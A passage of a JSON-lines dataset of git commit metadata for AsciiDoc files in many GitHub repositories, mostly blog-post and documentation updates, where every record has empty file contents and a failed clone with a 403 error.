2017-05-29-Anaya-Blog-Episode-1.adoc","message":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e37751460391958bb2206919eaef53f4e8fc28e","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8976c931afb02dc9e50070bf5cc8f41adb2b506","subject":"WICKET-6395 minor fixes to single.adoc","message":"WICKET-6395 minor fixes to single.adoc","repos":"aldaris\/wicket,dashorst\/wicket,dashorst\/wicket,mosoft521\/wicket,mosoft521\/wicket,apache\/wicket,selckin\/wicket,apache\/wicket,aldaris\/wicket,bitstorm\/wicket,aldaris\/wicket,apache\/wicket,aldaris\/wicket,selckin\/wicket,bitstorm\/wicket,apache\/wicket,mosoft521\/wicket,selckin\/wicket,dashorst\/wicket,dashorst\/wicket,selckin\/wicket,dashorst\/wicket,bitstorm\/wicket,mosoft521\/wicket,bitstorm\/wicket,mosoft521\/wicket,bitstorm\/wicket,aldaris\/wicket,apache\/wicket,selckin\/wicket","old_file":"wicket-user-guide\/src\/main\/asciidoc\/single.adoc","new_file":"wicket-user-guide\/src\/main\/asciidoc\/single.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wicket.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3a8a8d7946651cd5e7405f87ef00748470b24d6","subject":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","message":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topranks\/topranks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e079995c653859a508afb2b81f80ad6230a91e5","subject":"Update 2017-12-11-Large-Files-with-the-Fetch-API.adoc","message":"Update 
2017-12-11-Large-Files-with-the-Fetch-API.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-11-Large-Files-with-the-Fetch-API.adoc","new_file":"_posts\/2017-12-11-Large-Files-with-the-Fetch-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0269047b15a6173694aea7b23cdda8c321a63798","subject":"y2b create post Unboxing The $3000 Bluetooth Speaker","message":"y2b create post Unboxing The $3000 Bluetooth Speaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-12-Unboxing-The-3000-Bluetooth-Speaker.adoc","new_file":"_posts\/2017-04-12-Unboxing-The-3000-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad0015e839e184e7a51c90fb065309d7990f77f5","subject":"Create news landing page","message":"Create news landing page\n","repos":"clojure\/clojure-site","old_file":"content\/news\/news.adoc","new_file":"content\/news\/news.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6fe66d21d4c9002811cfa4e25cec49c8e753a826","subject":"Create SECURITY.adoc","message":"Create SECURITY.adoc","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"SECURITY.adoc","new_file":"SECURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f6b6e85ad127a0ff9d9da7d183a0cd88f4630c1","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9801a968f9fbdd9a2e78074c946c2d8265b672c2","subject":"y2b create post Gold Play Button Unboxing!","message":"y2b create post Gold Play Button Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-17-Gold-Play-Button-Unboxing.adoc","new_file":"_posts\/2014-11-17-Gold-Play-Button-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5174203ba53051e962f8d6358508cbd36fd81c1","subject":"Update 
2017-09-05-Error-Installing-Glide-Go.adoc","message":"Update 2017-09-05-Error-Installing-Glide-Go.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2017-09-05-Error-Installing-Glide-Go.adoc","new_file":"_posts\/2017-09-05-Error-Installing-Glide-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0207cc62137409bf5d0dcbd14862da78cf4745cd","subject":"y2b create post THE WEIRDEST SPEAKERS YET","message":"y2b create post THE WEIRDEST SPEAKERS YET","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-26-THE-WEIRDEST-SPEAKERS-YET.adoc","new_file":"_posts\/2016-06-26-THE-WEIRDEST-SPEAKERS-YET.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf1acc6bee8352898a5a164790a26dd2dcc25071","subject":"docs: update build-from-source instructions for blessed build layout","message":"docs: update build-from-source instructions for blessed build layout\n\nI'm not convinced that this makes sense; in my opinion, installation.adoc\nisn't intended for Kudu developers, but for people running on platforms for\nwhich we lack prebuilt binaries. JD pointed out that the Java client build\nmuddies this somewhat, as it's reasonable to expect these people to want to\nbuild the Java client, and by default maven will run unit tests, which will\nfail unless they're using the blessed build layout (or pass -DbinDir).\n\nAnyway, the blessed build layout doesn't actually hurt casual\nbuild-from-source people; it's just more complexity.\n\nI also removed the various mentions of openssl-devel as with the dlopen()\nchange to squeasel it's no longer necessary for building.\n\nChange-Id: Ic482c084397d13a0fd9e0b3e710449bc5cd866c4\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1997\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d0500398690f728c05075eb60d0311b24b012ed","subject":"Update 2015-11-27-Hello-World.adoc","message":"Update 
2015-11-27-Hello-World.adoc\n","repos":"doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io","old_file":"_posts\/2015-11-27-Hello-World.adoc","new_file":"_posts\/2015-11-27-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/doochik\/doochik.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1e94a6ad451d6c3232df0fdbeeea242432f6ec4","subject":"Update spark.adoc (#821)","message":"Update spark.adoc (#821)\n\nFix typo","repos":"elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8627ebdba22b7cfdee6b9a25ea6e1eecadb11a5b","subject":"Update 2015-11-03-Learning-About-Hadoop.adoc","message":"Update 2015-11-03-Learning-About-Hadoop.adoc","repos":"sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io","old_file":"_posts\/2015-11-03-Learning-About-Hadoop.adoc","new_file":"_posts\/2015-11-03-Learning-About-Hadoop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sumit1sen\/sumit1sen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49f8b8c11b83759fe0fcae312d754672366e5be","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a05038aa8bfbb966be017162cd8b2229d7a6c5","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b9735a77afdcac1d1043fd2d38d35da7b3b3a42","subject":"Publish 2015-5-10-uGui.adoc","message":"Publish 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c11a36e2d876307dda6e993a2e04fc0403505b","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f757ba329f6619dd97d7e870d5074801d6518e90","subject":"doc: update ASTF UDP","message":"doc: update ASTF UDP\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_astf.asciidoc","new_file":"doc\/trex_astf.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"656d73b144d8a33514fa8f465ff1f22261aa741a","subject":"Added IoCs for RTM","message":"Added IoCs for RTM\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"rtm\/README.adoc","new_file":"rtm\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8e325d13043b1d2ce68a20c8343005cad8f8f3b1","subject":"Update knowledgebase proto link","message":"Update knowledgebase proto link","repos":"destijl\/artifacts,destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc897fd2fa6240997451cee435c83657c5bc6915","subject":"Suppression adoc correspondant","message":"Suppression adoc correspondant","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c44f5f100ad63ff33d52874585437eebd6df7a33","subject":"Add textannotations.asciidoc","message":"Add textannotations.asciidoc\n","repos":"blindsightcorp\/rigor,blindsightcorp\/rigor","old_file":"textannotations.asciidoc","new_file":"textannotations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindsightcorp\/rigor.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d6fd9aad5737d3a4a007071126e9bcd3e80f430","subject":"Update 2015-05-06-explain-about-exam-app.adoc","message":"Update 
2015-05-06-explain-about-exam-app.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-05-06-explain-about-exam-app.adoc","new_file":"_posts\/2015-05-06-explain-about-exam-app.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76d5077927b4a09c4bfa48bcf555802089dcccec","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13ad970aa4b76e0eddc4bddf870aae91d33cbf26","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/httpie-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/httpie-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f30c13ceb6739d479dadfbcc97a4abf72a8ce15e","subject":"minor","message":"minor\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_index.asciidoc","new_file":"trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d5312cb81eb25cd6bcb6154440d0c6502d933be","subject":"Update 2017-04-23-Preterito-Imperfecto.adoc","message":"Update 2017-04-23-Preterito-Imperfecto.adoc","repos":"preteritoimperfecto\/preteritoimperfecto.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,preteritoimperfecto\/preteritoimperfecto.github.io","old_file":"_posts\/2017-04-23-Preterito-Imperfecto.adoc","new_file":"_posts\/2017-04-23-Preterito-Imperfecto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/preteritoimperfecto\/preteritoimperfecto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b5f5926c36d544cbefe77d97f974a407c06d399","subject":"fix: \u5909\u306a\u7a7a\u767d\u304c\u5165\u3063\u3066\u3044\u305f\u306e\u3092\u4fee\u6b63","message":"fix: 
\u5909\u306a\u7a7a\u767d\u304c\u5165\u3063\u3066\u3044\u305f\u306e\u3092\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b2702bacebfe6817723841228be7704ce0d03f","subject":"fix: \u6539\u884c\u4fee\u6b63","message":"fix: \u6539\u884c\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48eb01a2282ba6a656ea1fdb50d30b9bb15b544b","subject":"Delete 2017-01-15-A-title.adoc","message":"Delete 2017-01-15-A-title.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-01-15-A-title.adoc","new_file":"_posts\/2017-01-15-A-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc3e41e9acbf354f6de94b6824e8b635d86ffac5","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d170fc5a425ced7178dfae8ce77a7a6c573b1a0","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e78cef720e0516288bc625799bcb169f73c630e8","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79dbed7653227dcb786ae3cad573fb98f90ca986","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23f96e7b58a71fecc33177f6f8faf626148fc076","subject":"y2b create post Unboxing The World's Thinnest Keyboard","message":"y2b create post Unboxing The World's Thinnest Keyboard","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-07-Unboxing-The-Worlds-Thinnest-Keyboard.adoc","new_file":"_posts\/2017-06-07-Unboxing-The-Worlds-Thinnest-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff708cec8eb302156c825098652777b5454e22f9","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54e01ac0acbd80f110f7217051dfbd65193a3f5e","subject":"Added initial README.adoc","message":"Added initial README.adoc\n","repos":"lefou\/blended,woq-blended\/blended,lefou\/blended,woq-blended\/blended","old_file":"blended.security.scep.standalone\/README.adoc","new_file":"blended.security.scep.standalone\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60f08775f72616f1e53682991b8da4df21dbdcdc","subject":"Update 2016-06-14-W-W-D-C2016-i-O-S-10-A-P-I.adoc","message":"Update 
2016-06-14-W-W-D-C2016-i-O-S-10-A-P-I.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-06-14-W-W-D-C2016-i-O-S-10-A-P-I.adoc","new_file":"_posts\/2016-06-14-W-W-D-C2016-i-O-S-10-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb0668802b298f72ed24bbefbfaba1b911b04963","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f562a1ac92ad1dc620ccbdca1aa2c95fa1c81eb3","subject":"Deleted 2016-08-09.adoc","message":"Deleted 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd942cc7635d11d0589a3e22eca3f3d1be90bdb6","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45800ef9f0a7940b6746a1323f6b681bf8f814d7","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 